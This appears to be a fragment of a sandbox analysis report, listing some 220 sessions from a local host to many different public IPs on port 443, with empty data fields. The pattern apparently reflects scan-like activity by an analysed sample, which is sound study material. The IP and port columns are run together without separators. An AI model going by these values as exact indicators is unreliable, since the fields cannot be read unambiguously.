                                            28103192.168.2.2345628128.117.212.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28104192.168.2.2351774169.12.3.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28105192.168.2.2347668182.28.56.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28106192.168.2.233379693.71.219.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28107192.168.2.2339974212.147.154.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28108192.168.2.233434272.223.252.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28109192.168.2.233417640.1.12.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28110192.168.2.2353196125.170.122.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28111192.168.2.2343032107.99.113.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28112192.168.2.233951242.162.117.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28113192.168.2.2354254101.247.60.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28114192.168.2.234625037.36.205.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28115192.168.2.235296246.167.98.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28116192.168.2.234369044.72.193.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28117192.168.2.235102825.99.45.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28118192.168.2.235181247.135.199.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28119192.168.2.2348946123.65.65.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28120192.168.2.235323669.105.149.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28121192.168.2.235873243.23.142.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28122192.168.2.2357630186.39.109.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28123192.168.2.2336760178.105.158.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28124192.168.2.2343150115.220.53.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28125192.168.2.235470262.102.80.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28126192.168.2.235773281.223.129.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28127192.168.2.2341382206.252.112.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28128192.168.2.2357874220.247.98.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28129192.168.2.2335874194.47.200.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28130192.168.2.235465248.244.197.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28131192.168.2.2337768217.139.156.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28132192.168.2.2355736110.137.170.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28133192.168.2.2354420125.253.14.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28134192.168.2.234263457.102.159.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28135192.168.2.2358682194.238.56.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28136192.168.2.2349308209.141.18.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28137192.168.2.2336674145.216.102.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28138192.168.2.2334798223.215.234.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28139192.168.2.233987897.205.18.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28140192.168.2.2341680111.70.147.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28141192.168.2.2359442110.14.34.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28142192.168.2.2337370172.98.144.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28143192.168.2.233601252.66.163.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28144192.168.2.2359572157.42.193.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28145192.168.2.233804472.200.211.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28146192.168.2.234193275.186.205.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28147192.168.2.234908662.151.162.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28148192.168.2.2351896111.62.95.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28149192.168.2.233992280.33.81.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28150192.168.2.2333254162.176.188.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28151192.168.2.2349328223.12.166.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28152192.168.2.2347878211.13.242.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28153192.168.2.2338718137.133.70.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28154192.168.2.235250851.224.223.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28155192.168.2.234881491.209.31.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28156192.168.2.2360138188.220.232.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28157192.168.2.2346092155.220.136.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28158192.168.2.235220452.177.237.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28159192.168.2.2336142143.49.207.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28160192.168.2.2350412204.57.229.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28161192.168.2.2345804208.130.90.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28162192.168.2.234585483.187.19.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28163192.168.2.2340572193.92.219.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28164192.168.2.233478071.224.217.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28165192.168.2.23511782.134.120.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28166192.168.2.2335508198.1.167.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28167192.168.2.2337722156.188.106.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28168192.168.2.2354406177.143.232.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28169192.168.2.2342058125.192.246.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28170192.168.2.234183844.158.127.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28171192.168.2.2359678171.105.36.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28172192.168.2.235766669.204.255.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28173192.168.2.2336344114.82.141.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28174192.168.2.235770283.243.7.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28175192.168.2.233390212.113.136.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28176192.168.2.2353776111.153.102.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28177192.168.2.2355810171.81.105.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28178192.168.2.235863886.127.112.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28179192.168.2.235506868.200.30.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28180192.168.2.2356036104.17.15.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28181192.168.2.2357556186.10.237.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28182192.168.2.234505023.160.218.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28183192.168.2.2347494134.254.184.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28184192.168.2.2346744125.188.57.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28185192.168.2.2338702180.168.179.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28186192.168.2.2338360195.82.116.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28187192.168.2.2358924104.166.30.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28188192.168.2.2335172198.69.183.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28189192.168.2.2356530187.184.166.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28190192.168.2.234738498.129.175.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28191192.168.2.2345252217.102.61.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192192.168.2.233478258.211.172.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28193192.168.2.2335506186.18.58.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28194192.168.2.234377460.191.109.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28195192.168.2.2348390181.26.111.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28196192.168.2.2339260216.23.172.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28197192.168.2.2346124101.209.232.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28198192.168.2.2360148200.14.16.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28199192.168.2.2344948147.125.108.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28200192.168.2.2352612170.16.98.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28201192.168.2.2339956200.26.8.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28202192.168.2.234700238.195.182.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28203192.168.2.2336132132.62.92.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28204192.168.2.2340938154.74.126.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28205192.168.2.235879418.25.197.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28206192.168.2.234302058.106.250.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28207192.168.2.2348260142.15.229.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28208192.168.2.234416441.142.186.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28209192.168.2.233482649.151.3.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28210192.168.2.235676018.32.225.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28211192.168.2.2354266185.114.65.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28212192.168.2.233801646.5.217.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28213192.168.2.235288432.173.241.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28214192.168.2.2336294103.187.145.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28215192.168.2.234518071.203.138.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28216192.168.2.2337774221.212.167.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28217192.168.2.235648249.250.46.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28218192.168.2.2358610112.123.173.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28219192.168.2.233918654.236.9.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28220192.168.2.2336148183.19.62.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28221192.168.2.2358614186.227.120.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28222192.168.2.2347782124.191.32.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28223192.168.2.233528095.99.172.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28224192.168.2.2360350153.74.126.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28225192.168.2.2341020186.93.252.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28226192.168.2.2355328185.200.48.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28227192.168.2.235472444.195.159.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28228192.168.2.2346980101.15.187.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28229192.168.2.2339700102.145.165.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28230192.168.2.235637460.171.9.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28231192.168.2.2352356219.16.70.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28232192.168.2.2356898121.59.112.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28233192.168.2.2335410208.68.155.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28234192.168.2.233992898.163.219.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28235192.168.2.2338488194.198.188.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28236192.168.2.233858466.86.222.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28237192.168.2.233817652.2.22.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28238192.168.2.235622040.233.52.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28239192.168.2.2337124149.89.208.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28240192.168.2.2336494121.176.8.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28241192.168.2.2359416196.250.29.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28242192.168.2.2337026192.120.223.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28243192.168.2.2354030168.46.81.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28244192.168.2.2344750126.88.151.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28245192.168.2.234986669.230.50.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28246192.168.2.2337698119.20.26.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28247192.168.2.235001494.35.39.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28248192.168.2.2346138196.148.16.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28249192.168.2.2359508128.214.103.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28250192.168.2.234722649.112.244.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28251192.168.2.2354666216.238.91.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28252192.168.2.234239052.52.113.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28253192.168.2.2345570132.34.78.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28254192.168.2.233440812.198.53.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28255192.168.2.233345675.120.17.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28256192.168.2.2358402109.58.24.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28257192.168.2.2345844188.70.188.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28258192.168.2.2341072193.63.233.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28259192.168.2.2342560120.174.193.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28260192.168.2.2333172166.44.131.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28261192.168.2.234397847.115.182.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28262192.168.2.2360190202.247.191.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28263192.168.2.235116691.148.41.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28264192.168.2.2334118106.244.183.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28265192.168.2.2339566159.140.78.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28266192.168.2.2341430166.17.216.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28267192.168.2.2350742112.248.113.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28268192.168.2.234278270.225.0.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28269192.168.2.2351568110.70.174.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28270192.168.2.236020045.58.57.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28271192.168.2.2360566122.226.79.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28272192.168.2.2336736189.127.156.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28273192.168.2.235697091.80.41.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28274192.168.2.234010053.35.220.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28275192.168.2.2354184130.198.207.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28276192.168.2.2358388216.145.22.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28277192.168.2.235706096.94.45.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28278192.168.2.233714258.67.196.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28279192.168.2.2338490108.190.94.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28280192.168.2.2337816184.174.77.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28281192.168.2.2358832111.163.142.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28282192.168.2.2345626122.101.143.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28283192.168.2.2341528148.46.67.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28284192.168.2.2344696182.81.220.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28285192.168.2.233833650.161.222.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28286192.168.2.234959468.209.41.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28287192.168.2.2354400148.168.128.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28288192.168.2.2360412223.238.41.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28289192.168.2.235935260.22.105.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28290192.168.2.2346326196.37.56.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28291192.168.2.2344418148.4.248.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28292192.168.2.2359728161.11.92.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28293192.168.2.2350372125.81.14.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28294192.168.2.234650243.47.211.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28295192.168.2.234474413.121.250.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28296192.168.2.2344062188.234.196.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28297192.168.2.234139431.17.49.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28298192.168.2.235151642.173.67.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28299192.168.2.2344018148.115.227.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28300192.168.2.235250062.11.233.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28301192.168.2.2351614134.175.93.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28302192.168.2.2338376213.110.229.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28303192.168.2.235095284.163.205.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28304192.168.2.233463265.253.178.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28305192.168.2.234571886.17.166.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28306192.168.2.233957699.117.144.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28307192.168.2.2359224145.214.215.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28308192.168.2.235820284.132.90.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28309192.168.2.2360572181.188.247.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28310192.168.2.2347536118.94.254.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28311192.168.2.236002485.5.92.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28312192.168.2.2340790196.147.245.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28313192.168.2.2338580172.187.84.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28314192.168.2.2333206207.135.236.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28315192.168.2.235493481.215.135.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28316192.168.2.234948688.142.22.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28317192.168.2.2333768115.65.203.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28318192.168.2.2335024151.219.169.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28319192.168.2.234616681.107.85.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28320192.168.2.2333980149.12.221.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28321192.168.2.2359576160.56.214.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28322192.168.2.2336228143.4.138.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28323192.168.2.2337500134.251.50.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28324192.168.2.2349696152.16.231.37443
                                            TimestampBytes transferredDirectionData


